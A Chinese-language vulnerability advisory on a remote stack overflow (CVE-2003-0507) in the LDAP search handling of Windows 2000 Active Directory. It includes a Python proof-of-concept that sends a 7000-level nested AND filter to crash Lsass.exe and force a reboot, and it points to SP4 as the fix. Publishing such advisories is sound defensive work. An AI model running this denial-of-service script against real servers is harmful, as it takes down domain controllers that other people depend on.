安全研究
安全漏洞
Microsoft Windows Active目录远程堆栈溢出漏洞
发布日期:2003-07-02
更新日期:2003-07-04
受影响系统:
Microsoft Active Directory描述:
- Microsoft Windows 2000 Server
BUGTRAQ ID: 7930
CVE(CAN) ID: CVE-2003-0507
Windows活动目录(Active Directory)是Windows 2000结构的重要组件,是一款Microsoft公开提供的强大的目录服务系统。
Windows活动目录的LDAP 3搜索请求功能对用户提交请求缺少正确缓冲区边界检查,远程攻击者可以利用这个漏洞使Lsass.exe服务崩溃,触发缓冲区溢出。
通过活动目录提供的目录服务基于LDAP协议和并使用协议存储和获得Active目录对象。活动目录中使用LDAP 3的'search request'请求功能存在问题,攻击者如果构建超过1000个"AND"的请求,并发送给服务器,可导致触发堆栈溢出,使Lsass.exe服务崩溃,系统会在30秒内重新启动。
<*来源:CORE Security Technologies Advisories (advisories@coresecurity.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105716669921775&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
下面是一段Python测试脚本:
------------------------------------
class ActiveDirectoryDOS( Ldap ):
def __init__(self):
self._s = None
self.host = '192.168.0.1'
self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
self.port = 389
self.buffer = ''
self.msg_id = 1
Ldap.__init__()
def generateFilter_BinaryOp( self, filter ):
filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
return filterBuffer
def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
simpleBinOp = self.generateFilter_BinaryOp( filter )
filterBuffer = simpleBinOp
for cnt in range( 0, numTimes ):
filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
return filterBuffer
def searchSub( self, filterBuffer ):
self.bindRequest()
self.searchRequest( filterBuffer )
def run(self, host = '', basedn = '', name = '' ):
# the machine must not exist
machine_name = 'xaxax'
filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY,'name',machine_name)
# execute the anonymous query
print 'executing query'
filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
self.searchSub( filterBuffer )
------------------------------------
建议:
厂商补丁:
Microsoft
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
下载Windows 2000 SP4
http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/
浏览次数:3260
严重程度:0(网友投票)
绿盟科技给您安全的保障